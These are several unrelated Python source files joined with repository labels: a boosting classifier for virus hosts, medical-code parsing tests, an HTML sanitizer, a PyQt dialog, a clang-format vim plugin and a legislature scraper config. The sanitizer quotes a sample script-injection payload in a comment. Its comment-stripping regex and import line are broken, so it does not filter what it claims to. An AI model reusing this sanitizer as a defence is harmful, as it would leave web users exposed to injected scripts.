creates a results directory one level up and writes
to it.
kmer_dict : dict
A dictionary with row indices of data as keys and
some application relevant identifier of the row
as value. Values should be strings.
model : {**tree**, stump}
ADT model type
* tree = full ADT
* stump = ADT with depth 1
Returns
adt : ADT instance
The final ADT model.
performance : array
An array containing train/test accuracy of the model
at each boosting round, along with runtime for each
round.
.. note::
* D kmers
* N virus sequences
* L Host Classes
`phi[label]` dictionary stores outputs of each binary function
and the inheritance of each decision node. Its values
contain a function :math:`\psi` (:math:`1 \\times N` array),
a scalar :math:`\\alpha`, and a vote vector `v` (:math:`L \\times 1`
array). Their product is a :math:`L \\times N`
array which represents the contribution of the new
output node to the total classification of each object.
f is a rank 3 array (:math:`L \\times N \\times T+1`) that
stores the output of the ADT for each virus sequence at each round
of boosting.
Anil Raj, Michael Dewar, Gustavo Palacios, Raul Rabadan, Chris Wiggins.
Identifying Hosts of Families of Viruses: a Machine Learning Approach
arXiv:1105.5821v1 [q-bio.QM] 29 May 2011
"""
(D,N) = X.shape
L = Y.shape[0]
n = x.shape[1]
if test_indices:
test_indices.sort()
# create output file, if not provided
# create a data directory, one level above
if not output_file:
cwd = os.getcwd().split(os.sep)[:-1]
output_file = cwd[:-1].extend(['data','output.txt'])
output_file = os.sep.join(output_file)
os.makedirs(os.sep.join(cwd[:-1].extend(['data'])))
# Initialize data structures to store model and output
performance = np.zeros((T+1,5),dtype=float)
# Each example has equal weight of 1/NL
w = np.ones(Y.shape,dtype=float)/(N*L)
# phi stores the output of each binary-valued function
# for train and test data
phi = {'train': dict(), 'test': dict()}
# f = output of the ADT at each round, for train & test data
f = {'train': np.zeros((L,N,T+1), dtype=float),
'test': np.zeros((L,n,T+1), dtype=float)}
starttime = time.time()
# v = vote vector
v = (sum((w*Y),[1])>0)*2.-1.
# compute cumulative weights
Wplus = w[Y*v>0].sum()
Wminus = w[Y*v<0].sum()
# alpha = coefficient of weak rule
alpha = 0.5*np.log((Wplus+EPS)/(Wminus+EPS))
# alpha is kept positive
#vote vector captures the sign of the rule coefficient
if alpha<0:
alpha = np.abs(alpha)
v = -1*v
# update phi dictionary. Array represents \psi
phi['train'][-1] = [[np.ones((1,N),dtype=float),alpha,v]]
phi['test'][-1] = [[np.ones((1,n),dtype=float),alpha,v]]
# initialize ADT
adt = ADT(alpha,v)
# compute the prediction of the ADT for all train/test samples
# train/test (keys), data dictionary (values)
for label,data in phi.items():
# data.values() has one output node with a list [\psi, v and \alpha]
for node in data.values():
# child(ren) are \psi, v, \alpha
for child in node:
# Entries of product represent the contribution of the new weak
# rule to the classification of each virus.
f[label][:,:,0] += reduce(prod,child)
# updated weights
w = np.exp(-f['train'][:,:,0]*Y)
w = w/w.sum()
# compute classification error at round 0
performance[0,:4] = compute_auc(f['train'][:,:,0],f['test'][:,:,0],Y,y)
performance[0,4] = time.time() - starttime
# write intermediate output to file
handle = open(output_file,'a')
to_write = [-1, 'root', 'None']
to_write.extend(list(performance[0,:]))
handle.write('\t'.join(map(str,to_write))+'\n')
handle.close()
# starting boosting rounds
for t in range(T):
starttime = time.time()
# choose the appropriate (path,feature) for the next binary-valued function
path, feature, decision, threshold \
= get_new_function(X, Y, phi['train'], w, model)
# slices the feature space to an array which represents the kmer feature the
# new weak rule has picked. Returns a 1xN array of {True, False}
PX = X[feature:feature+1,:]<threshold
px = x[feature:feature+1,:]<threshold
phi['train'][t] = []
phi['test'][t] = []
adt.add_decision_node(t, kmer_dict[feature], threshold)
adt.add_child(path, t, decision)
# iterates over the two output nodes that a decision node can have.
# 0 indicates a "yes" output and 1 indicates a "no" output.
for ans in [0,1]:
# compute output of decision function
# the train_phi is based on its value prior to decision round t
train_phi = phi['train'][path][decision][0] * (ans+(-1.)**ans*PX)
test_phi = phi['test'][path][decision][0] * (ans+(-1.)**ans*px)
# calculate optimal value of (alpha,v) for the new
# binary-valued function
v = (sum(w*Y*train_phi,[1])>0)*2.-1.
Wplus = w[Y*v*train_phi>0].sum()
Wminus = w[Y*v*train_phi<0].sum()
alpha = 0.5*np.log((Wplus+EPS)/(Wminus+EPS))
# alpha is always kept positive
if alpha<0:
alpha = np.abs(alpha)
v = -1*v
# Update Tree and prediction dictionary
phi['train'][t].append([train_phi,alpha,v])
phi['test'][t].append([test_phi,alpha,v])
adt.add_output_node(t, alpha, v)
# compute the prediction of the ADT for all train/test samples
# train/test (keys), data dictionary (values)
for label,data in phi.items():
# data.values() has two output nodes with each with a list [\psi, v and \alpha]
for node in data.values():
# child(ren) are \psi, v, \alpha
for child in node:
# Entries of product represent the contribution of the new weak
# rule to the classification of each virus.
f[label][:,:,t+1] += reduce(prod,child)
# updated weights
w = np.exp(-f['train'][:,:,t+1]*Y)
w = w/w.sum()
# compute the test / train AUC and test / train classification errors
performance[t+1,:4] = compute_auc(f['train'][:,:,t+1], f['test'][:,:,t+1], Y, y)
predicted_labels[test_indices,t] = f['test'][:,:,t+1].argmax(0)
performance[t+1,4] = time.time() - starttime
# output data
handle = open(output_file,'a')
to_write = [t, kmer_dict[feature], threshold]
to_write.extend(list(performance[t+1,:]))
handle.write('\t'.join(map(str,to_write))+'\n')
handle.close()
return adt, f, performance, predicted_labels
def compute_auc(train, test, Y, y):
"""Computes measures of accuracy for train and test data.
Computes the ROC curve and the area under that curve, as a
measure of classification accuracy. The threshold corresponding
to the point on the ROC curve farthest from `y=x` line is selected
and fraction of correct predictions corresponding to that
threshold is returned.
Arguments
train : float array
Array of predictions of the model on training data where rows
correspond to labels and columns correspond to samples.
test : float array
Array of predictions of the model on testing data where rows
correspond to labels and columns correspond to samples.
Y : float array
Training labels where rows correspond to labels
and columns to samples. This is an array of {1,-1}.
y : float array
Testing labels where rows correspond to labels
and columns to samples. This is an array of {1,-1}.
Returns
performance : float array
Array containing the AUC for training data, classification
accuracy for training data, AUC for testing data and
classification accuracy for testing data, in that order.
.. note::
* For binary-class classification, AUC is proportional to the Mann-Whitney U test statistic which computes a measure of the separation between values of positive labels and negative labels.
* For multi-class classification, this formula for computing classifier AUC is one of many. A more principled way would involve computing the Volume under an ROC surface.
"""
# computing train AUC
NP = (Y==1).sum()
NM = (Y==-1).sum()
try:
U = stats.mannwhitneyu(train[(Y==1)],train[(Y==-1)])
train_auc = 1.-U[0]/(NP*NM)
except ValueError:
train_auc = 0.5
# computing test AUC
NP = (y==1).sum()
NM = (y==-1).sum()
try:
U = stats.mannwhitneyu(test[(y==1)],test[(y==-1)])
test_auc = 1.-U[0]/(NP*NM)
except ValueError:
test_auc = 0.5
# accuracy = number of examples where argmax of prediction
# equals true label
# train accuracy
train_accuracy = (train.argmax(0)-Y.argmax(0)==0).sum()/float(Y.shape[1])
# test accuracy
test_accuracy = (test.argmax(0)-y.argmax(0)==0).sum()/float(y.shape[1])
return np.array([train_auc, train_accuracy, test_auc, test_accuracy])
def get_new_function(X, Y, phi, w, model='tree'):
"""This function finds the best feature to add to an ADT.
This function computes the minimum exponential loss achieved
by each potential decision node and selects the one that
has the least exponential loss.
Arguments
X : float array
Data array where rows correspond to features and columns
correspond to samples.
Y : int array
Label array where rows correspond to labels and columns
correspond to samples. Entries in this matrix should only
be +1 or -1.
phi : dict
Dictionary of outputs of binary-valued functions in an
ADT (i.e., value of samples at the ADT's output nodes).
See parent function `Adaboost` for details on keys and
values.
w : float array
Array of weights over samples where rows correspond to
labels and columns correspond to samples.
Kwargs
model : {**tree**,stump}
Returns
path : int
Index of the decision node to which the new feature
should be connected in the ADT.
feature : int
Row index of data matrix `X` that corresponds to the
selected feature.
decision : {0,1}
Output node of the decision node `path` to which the
decision node corresponding to the new feature should be
connected.
threshold : int or float
Threshold attribute of the decision node for the selected
feature.
.. note::
* D kmers
* N virus sequences
* L Host Classes
.. warning::
* The code builds a list of all possible threshold values from the entire data matrix. This is a bad idea if the data matrix has too many possible values.
* The C code expects the arrays passed to be in C contiguous order. This needs to be generalized, using strides, since simple operations (like transposing) can change the array to Fortran contiguous. Click this `link <http://stackoverflow.com/ questions/4420622/how-to-account-for-column-contiguous-array-when-extending-numpy-with-c>`_ to see how to do this.
"""
(D,N) = X.shape
K = Y.shape[0]
if model=='tree':
keys = phi.keys()
keys.sort()
phi_array = np.array([output_node[0][0] for round in keys for output_node in phi[round]])
order = [[key,key] for key in keys]
order = [p for ps in order for p in ps]
order.pop(0)
elif model=='stump':
keys = phi.keys()
keys.sort()
phi_array = np.array([output_node[0][0] for round in keys for output_node in phi[round]])
# `Z` holds the loss for each decision rule `phi` being tested
Z = np.zeros((phi_array.shape[0],D),dtype=float)
thresholds = np.unique(X[:])
results = np.zeros((3,),dtype='int')
# parse the C code from get_new_function.c
#f = open(os.cwd()+'get_new_function.c','r')
f = open('get_new_function.c','r')
C_code = '\n'.join([line for line in f if '//' not in line])
f.close()
support_code = "#include <math.h>"
# the python code that calls the C code using weave.inline
weave.inline(C_code, ['X','Y','phi_array','w','thresholds','results','Z'], \
support_code=support_code, verbose=2, compiler='gcc')
path = order[results[0]]
feature = results[1]
if results[0]:
decision = 1-results[0]%2
else:
decision = 0
threshold = results[2]
return path, feature, decision, threshold
| rajanil/mkboost | src/boost.py | Python | mit | 18,517 |
# coding: utf-8
from nose.tools import assert_equal # @UnresolvedImport
from clinvoc.icd10 import ICD10CM, ICD10PCS
from clinvoc.icd9 import ICD9CM, ICD9PCS
from clinvoc.ubrev import UBREV
from clinvoc.hcpcs import HCPCS, HCPCSModifier
from clinvoc.ndc import NDC
from clinvoc.loinc import LOINC
def test_icd10_cm_no_decimals():
vocab = ICD10CM(use_decimals=False, match_terminal_only=True)
assert_equal(vocab.standardize('A150'), 'A15.0')
def test_icd10_cm():
vocab = ICD10CM(match_terminal_only=True)
assert_equal(vocab.parse('‘Z00.00’, ‘Z00.01’, ‘Z00.121’, ‘Z00.129’, ‘Z00.8’'),
{'Z00.00', 'Z00.01', 'Z00.121', 'Z00.129', 'Z00.8'})
assert_equal(vocab.parse('‘Z00.00-Z00.01’, ‘Z00.121’, ‘Z00.129’, ‘Z00.8’'),
{'Z00.00', 'Z00.01', 'Z00.121', 'Z00.129', 'Z00.8'})
assert_equal(vocab.parse('‘Z00.00-Z00.0*’, ‘Z00.121’, ‘Z00.129’, ‘Z00.8’'),
{'Z00.00', 'Z00.01', 'Z00.121', 'Z00.129', 'Z00.8'})
assert_equal(vocab.parse('‘Z00.0*-Z00.0*’, ‘Z00.121’, ‘Z00.129’, ‘Z00.8’'),
{'Z00.00', 'Z00.01', 'Z00.121', 'Z00.129', 'Z00.8'})
assert_equal(vocab.parse(' Z00.00 "Z00.01" Z00.121 Z00.129 Z00.8'),
{'Z00.00', 'Z00.01', 'Z00.121', 'Z00.129', 'Z00.8'})
def test_icd10_pcs():
vocab = ICD10PCS(match_terminal_only=True, use_leading_zeros=True)
assert_equal(vocab.parse("'0210093', '0210098', '0210099', '0211093', '0211098'"),
{'021.0093', '021.0098', '021.0099', '021.1093', '021.1098'})
assert_equal(vocab.parse("'0210093', '0210098 - 0210099', '0211093', '0211098'"),
{'021.0093', '021.0098', '021.0099', '021.1093', '021.1098'})
assert_equal(vocab.parse('0DV68DZ'), {'0DV.68DZ'})
vocab = ICD10PCS(match_terminal_only=True, use_decimals=True)
assert_equal(vocab.parse("'21.0093', '021.009*', '21.1093', '021.1098'"),
{'021.0093', '021.0098', '021.0099', '021.1093', '021.1098', '021.009C',
'021.009F', '021.009W'})
def test_icd10_union():
vocab = ICD10CM(match_terminal_only=True) | ICD10PCS(match_terminal_only=True, use_leading_zeros=True)
assert_equal(vocab.parse("'0210093', ‘Z00.121’"), set(['021.0093', 'Z00.121']))
def test_icd9_cm():
vocab = ICD9CM(match_terminal_only=True)
assert_equal(vocab.parse("250.33, 250.40, 250.41, 250.42, 250.43,"),
{'250.33', '250.40', '250.41', '250.42', '250.43'})
assert_equal(vocab.parse("250.33, 250.40-250.43,"),
{'250.33', '250.40', '250.41', '250.42', '250.43'})
assert_equal(vocab.parse("250.33, 250.4*,"),
{'250.33', '250.40', '250.41', '250.42', '250.43'})
assert_equal(vocab.parse('42'), {'042'})
def test_icd9_pcs():
vocab = ICD9PCS(match_terminal_only=True)
assert_equal(vocab.parse("'79.27', '79.33', '79.37', '79.63', '79.67'"),
{'79.27', '79.33', '79.37', '79.63', '79.67'})
assert_equal(vocab.parse("'79.37', '79.33'-'79.37', '79.63', '79.67'"),
{'79.33', '79.37', '79.63', '79.67', '79.36', '79.34', '79.35'})
assert_equal(vocab.parse("'79.37', '79.3*', '79.63', '79.67'"),
{'79.33', '79.37', '79.63', '79.67', '79.36', '79.34', '79.35',
'79.32', '79.39', '79.30', '79.31', '79.38'})
def test_ubrev():
vocab = UBREV()
assert_equal(vocab.parse('116'),
{'0116'})
assert_equal(vocab.parse('116-118'),
{'0116', '0117', '0118'})
def test_loinc():
vocab = LOINC()
assert_equal(vocab.parse('10037-*-10038-8, 1-1'),
{'10037-0', '10038-8', '00001-1'})
def test_hcpcs():
vocab = HCPCS()
assert_equal(vocab.parse("'99377', '99378', 'G0182', 'G9473', 'G9474-G9477'"),
{'99377', '99378', 'G0182', 'G9473', 'G9474', 'G9475', 'G9476', 'G9477'})
assert_equal(vocab.parse("'99377-99378', 'G0182', 'G9473', 'G9474'"),
{'99377', '99378', 'G0182', 'G9473', 'G9474'})
assert_equal(vocab.parse("'99377 - 99378', 'G0182', 'G9473 -G9474'"),
{'99377', '99378', 'G0182', 'G9473', 'G9474'})
assert_equal(vocab.parse("'G947*'"),
{'G9470', 'G9471', 'G9472', 'G9473', 'G9474', 'G9475', 'G9476', 'G9477',
'G9478', 'G9479', 'G947T', 'G947U', 'G947F', 'G947M'})
def test_hcpcs_modifier():
vocab = HCPCSModifier()
assert_equal(vocab.parse('G6, G7'), {'G6', 'G7'})
def test_ndc():
vocab = NDC()
assert_equal(vocab.parse('\'10928-252-3\' , 91201792718'), {'10928025203', '91201792718'})
if __name__ == '__main__':
import sys
import nose
# This code will run the test in this file.'
module_name = sys.modules[__name__].__file__
result = nose.run(argv=[sys.argv[0],
module_name,
'-s', '-v']) | jcrudy/clinvoc | clinvoc/test/test_code_systems.py | Python | mit | 4,969 |
from beautifulsoup4 import beautifulsoup4
import re
def sanitize(html):
# allow these tags. Other tags are removed, but their child elements remain
whitelist = ['em', 'i', 'strong', 'u', 'a', 'b', 'p', 'br', 'code', 'pre', 'table', 'tr', 'td' ]
# allow only these attributes on these tags. No other tags are allowed any
# attributes.
attr_whitelist = { 'a':['href','title','hreflang']}
# remove these tags, complete with contents.
blacklist = [ 'script', 'style' ]
attributes_with_urls = [ 'href', 'src' ]
# BeautifulSoup is catching out-of-order and unclosed tags, so markup
# can't leak out of comments and break the rest of the page.
soup = BeautifulSoup(html)
# now strip HTML we don't like.
for tag in soup.findAll():
if tag.name.lower() in blacklist:
# blacklisted tags are removed in their entirety
tag.extract()
elif tag.name.lower() in whitelist:
# tag is allowed. Make sure all the attributes are allowed.
for attr in tag.attrs:
# allowed attributes are whitelisted per-tag
if tag.name.lower() in attr_whitelist and \
attr[0].lower() in attr_whitelist[ tag.name.lower() ]:
# some attributes contain urls..
if attr[0].lower() in attributes_with_urls:
# ..make sure they're nice urls
if not re.match(r'(https?|ftp)://', attr[1].lower()):
tag.attrs.remove( attr )
# ok, then
pass
else:
# not a whitelisted attribute. Remove it.
del tag[attr]
else:
# not a whitelisted tag. I'd like to remove it from the tree
# and replace it with its children. But that's hard. It's much
# easier to just replace it with an empty span tag.
tag.name = "span"
tag.attrs = []
# stringify back again
safe_html = str(soup)
# HTML comments can contain executable scripts, depending on the browser,
# so we'll
# be paranoid and just get rid of all of them
# e.g. <!--[if lt IE 7]><script type="text/javascript">h4x0r();</script><!
# [endif]-->
# TODO - I rather suspect that this is the weakest part of the operation..
safe_html = re.sub(r'<!--[.\n]*?-->','',safe_html)
return safe_html
if __name__ == "__main__":
import sys
input_file = open(sys.argv[1])
output_file = open(sys.argv[2], "w")
output_file.write(sanitize(input_file.read()).encode("utf8"))
output_file.close()
| fredzannarbor/pagekicker-community | scripts_python_3/bin/sanitize.py | Python | apache-2.0 | 2,661 |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'pygesture/ui/templates/new_session_template.ui'
#
# Created by: PyQt5 UI code generator 5.5
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_NewSessionDialog(object):
def setupUi(self, NewSessionDialog):
NewSessionDialog.setObjectName("NewSessionDialog")
NewSessionDialog.setWindowModality(QtCore.Qt.NonModal)
NewSessionDialog.resize(288, 201)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(NewSessionDialog.sizePolicy().hasHeightForWidth())
NewSessionDialog.setSizePolicy(sizePolicy)
NewSessionDialog.setSizeGripEnabled(False)
NewSessionDialog.setModal(True)
self.gridLayout = QtWidgets.QGridLayout(NewSessionDialog)
self.gridLayout.setObjectName("gridLayout")
self.participantLabel = QtWidgets.QLabel(NewSessionDialog)
self.participantLabel.setObjectName("participantLabel")
self.gridLayout.addWidget(self.participantLabel, 0, 0, 1, 1)
self.participantLineEdit = QtWidgets.QLineEdit(NewSessionDialog)
self.participantLineEdit.setObjectName("participantLineEdit")
self.gridLayout.addWidget(self.participantLineEdit, 0, 1, 1, 1)
self.sessionLabel = QtWidgets.QLabel(NewSessionDialog)
self.sessionLabel.setObjectName("sessionLabel")
self.gridLayout.addWidget(self.sessionLabel, 1, 0, 1, 1)
self.sessionLineEdit = QtWidgets.QLineEdit(NewSessionDialog)
self.sessionLineEdit.setObjectName("sessionLineEdit")
self.gridLayout.addWidget(self.sessionLineEdit, 1, 1, 1, 1)
self.label_3 = QtWidgets.QLabel(NewSessionDialog)
self.label_3.setObjectName("label_3")
self.gridLayout.addWidget(self.label_3, 2, 0, 1, 1)
self.taskComboBox = QtWidgets.QComboBox(NewSessionDialog)
self.taskComboBox.setObjectName("taskComboBox")
self.gridLayout.addWidget(self.taskComboBox, 2, 1, 1, 1)
self.configurationLabel = QtWidgets.QLabel(NewSessionDialog)
self.configurationLabel.setObjectName("configurationLabel")
self.gridLayout.addWidget(self.configurationLabel, 3, 0, 1, 1)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.armRadioButton = QtWidgets.QRadioButton(NewSessionDialog)
self.armRadioButton.setChecked(True)
self.armRadioButton.setObjectName("armRadioButton")
self.configurationGroup = QtWidgets.QButtonGroup(NewSessionDialog)
self.configurationGroup.setObjectName("configurationGroup")
self.configurationGroup.addButton(self.armRadioButton)
self.horizontalLayout.addWidget(self.armRadioButton)
self.legRadioButton = QtWidgets.QRadioButton(NewSessionDialog)
self.legRadioButton.setObjectName("legRadioButton")
self.configurationGroup.addButton(self.legRadioButton)
self.horizontalLayout.addWidget(self.legRadioButton)
self.gridLayout.addLayout(self.horizontalLayout, 3, 1, 1, 1)
self.label_2 = QtWidgets.QLabel(NewSessionDialog)
self.label_2.setObjectName("label_2")
self.gridLayout.addWidget(self.label_2, 4, 0, 1, 1)
self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.radioButton = QtWidgets.QRadioButton(NewSessionDialog)
self.radioButton.setChecked(True)
self.radioButton.setObjectName("radioButton")
self.handGroup = QtWidgets.QButtonGroup(NewSessionDialog)
self.handGroup.setObjectName("handGroup")
self.handGroup.addButton(self.radioButton)
self.horizontalLayout_3.addWidget(self.radioButton)
self.radioButton_2 = QtWidgets.QRadioButton(NewSessionDialog)
self.radioButton_2.setObjectName("radioButton_2")
self.handGroup.addButton(self.radioButton_2)
self.horizontalLayout_3.addWidget(self.radioButton_2)
self.gridLayout.addLayout(self.horizontalLayout_3, 4, 1, 1, 1)
self.buttonBox = QtWidgets.QDialogButtonBox(NewSessionDialog)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.setObjectName("buttonBox")
self.gridLayout.addWidget(self.buttonBox, 5, 0, 1, 2)
self.retranslateUi(NewSessionDialog)
self.buttonBox.accepted.connect(NewSessionDialog.accept)
self.buttonBox.rejected.connect(NewSessionDialog.reject)
QtCore.QMetaObject.connectSlotsByName(NewSessionDialog)
NewSessionDialog.setTabOrder(self.participantLineEdit, self.sessionLineEdit)
NewSessionDialog.setTabOrder(self.sessionLineEdit, self.taskComboBox)
NewSessionDialog.setTabOrder(self.taskComboBox, self.armRadioButton)
NewSessionDialog.setTabOrder(self.armRadioButton, self.legRadioButton)
NewSessionDialog.setTabOrder(self.legRadioButton, self.radioButton)
NewSessionDialog.setTabOrder(self.radioButton, self.radioButton_2)
def retranslateUi(self, NewSessionDialog):
_translate = QtCore.QCoreApplication.translate
NewSessionDialog.setWindowTitle(_translate("NewSessionDialog", "New Session"))
self.participantLabel.setText(_translate("NewSessionDialog", "Participant ID:"))
self.sessionLabel.setText(_translate("NewSessionDialog", "Session ID:"))
self.label_3.setText(_translate("NewSessionDialog", "Task:"))
self.configurationLabel.setText(_translate("NewSessionDialog", "Configuration:"))
self.armRadioButton.setText(_translate("NewSessionDialog", "arm"))
self.legRadioButton.setText(_translate("NewSessionDialog", "leg"))
self.label_2.setText(_translate("NewSessionDialog", "Hand:"))
self.radioButton.setText(_translate("NewSessionDialog", "right"))
self.radioButton_2.setText(_translate("NewSessionDialog", "left"))
| ixjlyons/pygesture | pygesture/ui/templates/new_session_template.py | Python | bsd-3-clause | 6,242 |
# This file is a minimal clang-format vim-integration. To install:
# - Change 'binary' if clang-format is not on the path (see below).
# - Add to your .vimrc:
#
# map <C-I> :pyf <path-to-this-file>/clang-format.py<cr>
# imap <C-I> <c-o>:pyf <path-to-this-file>/clang-format.py<cr>
#
# The first line enables clang-format for NORMAL and VISUAL mode, the second
# line adds support for INSERT mode. Change "C-I" to another binding if you
# need clang-format on a different key (C-I stands for Ctrl+i).
#
# With this integration you can press the bound key and clang-format will
# format the current line in NORMAL and INSERT mode or the selected region in
# VISUAL mode. The line or region is extended to the next bigger syntactic
# entity.
#
# You can also pass in the variable "l:lines" to choose the range for
# formatting. This variable can either contain "<start line>:<end line>" or
# "all" to format the full file. So, to format the full file, write a function
# like:
# :function FormatFile()
# : let l:lines="all"
# : pyf <path-to-this-file>/clang-format.py
# :endfunction
#
# It operates on the current, potentially unsaved buffer and does not create
# or save any files. To revert a formatting, just undo.
import difflib
import json
import subprocess
import sys
import vim
# set g:clang_format_path to the path to clang-format if it is not on the path
# Change this to the full path if clang-format is not on the path.
binary = 'clang-format'
if vim.eval('exists("g:clang_format_path")') == "1":
binary = vim.eval('g:clang_format_path')
# Change this to format according to other formatting styles. See the output of
# 'clang-format --help' for a list of supported styles. The default looks for
# a '.clang-format' or '_clang-format' file to indicate the style that should be
# used.
style = '{BasedOnStyle: google, IndentWidth: 4}'
fallback_style = None
if vim.eval('exists("g:clang_format_fallback_style")') == "1":
fallback_style = vim.eval('g:clang_format_fallback_style')
def main():
# Get the current text.
buf = vim.current.buffer
text = '\n'.join(buf)
# Determine range to format.
if vim.eval('exists("l:lines")') == '1':
lines = vim.eval('l:lines')
else:
lines = '%s:%s' % (vim.current.range.start + 1, vim.current.range.end + 1)
# Determine the cursor position.
cursor = int(vim.eval('line2byte(line("."))+col(".")')) - 2
if cursor < 0:
print 'Couldn\'t determine cursor position. Is your file empty?'
return
# Avoid flashing an ugly, ugly cmd prompt on Windows when invoking clang-format.
startupinfo = None
if sys.platform.startswith('win32'):
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
startupinfo.wShowWindow = subprocess.SW_HIDE
# Call formatter.
command = [binary, '-style', style, '-cursor', str(cursor)]
if lines != 'all':
command.extend(['-lines', lines])
if fallback_style:
command.extend(['-fallback-style', fallback_style])
if vim.current.buffer.name:
command.extend(['-assume-filename', vim.current.buffer.name])
p = subprocess.Popen(command,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE, startupinfo=startupinfo)
stdout, stderr = p.communicate(input=text)
# If successful, replace buffer contents.
if stderr:
print stderr
if not stdout:
print ('No output from clang-format (crashed?).\n' +
'Please report to bugs.llvm.org.')
else:
lines = stdout.split('\n')
output = json.loads(lines[0])
lines = lines[1:]
sequence = difflib.SequenceMatcher(None, vim.current.buffer, lines)
for op in reversed(sequence.get_opcodes()):
if op[0] is not 'equal':
vim.current.buffer[op[1]:op[2]] = lines[op[3]:op[4]]
if output.get('IncompleteFormat'):
print 'clang-format: incomplete (syntax errors)'
vim.command('goto %d' % (output['Cursor'] + 1))
main()
| 8carlosf/dotfiles | vim/.vim/clang-format.py | Python | unlicense | 3,961 |
from utils import url_xpath, State
from .people import MSLegislatorScraper
from .bills import MSBillScraper
# from .committees import MSCommitteeScraper
class Mississippi(State):
scrapers = {
"people": MSLegislatorScraper,
# "committees": MSCommitteeScraper,
"bills": MSBillScraper,
}
legislative_sessions = [
{
"_scraped_name": "2008 Regular Session",
"identifier": "2008",
"name": "2008 Regular Session",
"start_date": "2008-01-08",
"end_date": "2008-04-23",
},
{
"_scraped_name": "2009 Regular Session",
"identifier": "2009",
"name": "2009 Regular Session",
"start_date": "2009-01-06",
"end_date": "2009-04-14",
},
{
"_scraped_name": "2009 First Extraordinary Session",
"identifier": "20091E",
"name": "2009, 1st Extraordinary Session",
"start_date": "2009-05-07",
"end_date": "2009-05-08",
},
{
"_scraped_name": "2009 Second Extraordinary Session",
"identifier": "20092E",
"name": "2009, 2nd Extraordinary Session",
"start_date": "2009-06-28",
"end_date": "2009-06-30",
},
{
"_scraped_name": "2009 Third Extraordinary Session",
"identifier": "20093E",
"name": "2009, 3rd Extraordinary Session",
"start_date": "2009-07-10",
"end_date": "2013-06-27",
},
{
"_scraped_name": "2010 Regular Session",
"identifier": "2010",
"name": "2010 Regular Session",
"start_date": "2010-01-05",
"end_date": "2010-05-03",
},
{
"_scraped_name": "2010 First Extraordinary Session",
"identifier": "20101E",
"name": "2010, 1st Extraordinary Session",
"start_date": "2010-04-22",
"end_date": "2010-05-04",
},
{
"_scraped_name": "2010 Second Extraordinary Session",
"identifier": "20102E",
"name": "2010, 2nd Extraordinary Session",
"start_date": "2010-08-27",
"end_date": "2010-08-31",
},
{
"_scraped_name": "2011 Regular Session",
"identifier": "2011",
"name": "2011 Regular Session",
"start_date": "2011-01-04",
"end_date": "2011-04-07",
},
{
"_scraped_name": "2011 First Extraordinary Session",
"identifier": "20111E",
"name": "2011, 1st Extraordinary Session",
"start_date": "2011-09-02",
"end_date": "2011-09-07",
},
{
"_scraped_name": "2012 Regular Session",
"identifier": "2012",
"name": "2012 Regular Session",
"start_date": "2012-01-03",
"end_date": "2012-04-07",
},
{
"_scraped_name": "2013 Regular Session",
"identifier": "2013",
"name": "2013 Regular Session",
"start_date": "2013-01-08",
"end_date": "2013-04-07",
},
{
"_scraped_name": "2013 First Extraordinary Session",
"identifier": "20131E",
"name": "2013 First Extraordinary Session",
"start_date": "2013-04-26",
"end_date": "2013-04-26",
},
{
"_scraped_name": "2013 Second Extraordinary Session",
"identifier": "20132E",
"name": "2013 Second Extraordinary Session",
"start_date": "2013-06-27",
"end_date": "2013-06-28",
},
{
"_scraped_name": "2014 Regular Session",
"identifier": "2014",
"name": "2014 Regular Session",
"start_date": "2014-01-07",
"end_date": "2014-04-02",
},
{
"_scraped_name": "2014 First Extraordinary Session",
"identifier": "20141E",
"name": "2014 First Extraordinary Session",
"start_date": "2014-04-02",
"end_date": "2014-04-02",
},
{
"_scraped_name": "2014 Second Extraordinary Session",
"identifier": "20142E",
"name": "2014 Second Extraordinary Session",
"start_date": "2014-05-08",
"end_date": "2014-05-08",
},
{
"_scraped_name": "2015 Regular Session",
"identifier": "2015",
"name": "2015 Regular Session",
"start_date": "2015-01-06",
"end_date": "2015-04-02",
},
{
"_scraped_name": "2016 Regular Session",
"classification": "primary",
"identifier": "2016",
"name": "2016 Regular Session",
"start_date": "2016-01-05",
"end_date": "2016-04-21",
},
{
"_scraped_name": "2016 First Extraordinary Session",
"identifier": "20161E",
"name": "2016 First Extraordinary Session",
"start_date": "2016-02-04",
"end_date": "2016-02-04",
},
{
"_scraped_name": "2016 Second Extraordinary Session",
"identifier": "20162E",
"name": "2016 Second Extraordinary Session",
"start_date": "2016-06-28",
"end_date": "2016-06-29",
},
{
"_scraped_name": "2017 Regular Session",
"classification": "primary",
"identifier": "2017",
"name": "2017 Regular Session",
"start_date": "2017-01-03",
"end_date": "2017-03-29",
},
{
"_scraped_name": "2017 First Extraordinary Session",
"classification": "special",
"identifier": "20171E",
"name": "2017 First Extraordinary Session",
"start_date": "2017-06-05",
"end_date": "2017-06-23",
},
{
"_scraped_name": "2018 Regular Session",
"classification": "primary",
"identifier": "2018",
"name": "2018 Regular Session",
"start_date": "2018-01-02",
"end_date": "2018-04-01",
},
{
"_scraped_name": "2018 First Extraordinary Session",
"classification": "special",
"identifier": "20181E",
"name": "2018 First Extraordinary Session",
"start_date": "2018-08-23",
"end_date": "2018-08-29",
},
{
"_scraped_name": "2019 Regular Session",
"classification": "primary",
"identifier": "2019",
"name": "2019 Regular Session",
"start_date": "2019-01-08",
"end_date": "2019-03-05",
},
{
"_scraped_name": "2020 Regular Session",
"classification": "primary",
"identifier": "2020",
"name": "2020 Regular Session",
"start_date": "2020-01-07",
"end_date": "2020-05-10",
},
]
ignored_scraped_sessions = [
"2008 First Extraordinary Session",
"2007 Regular Session",
"2007 First Extraordinary Session",
"2006 Regular Session",
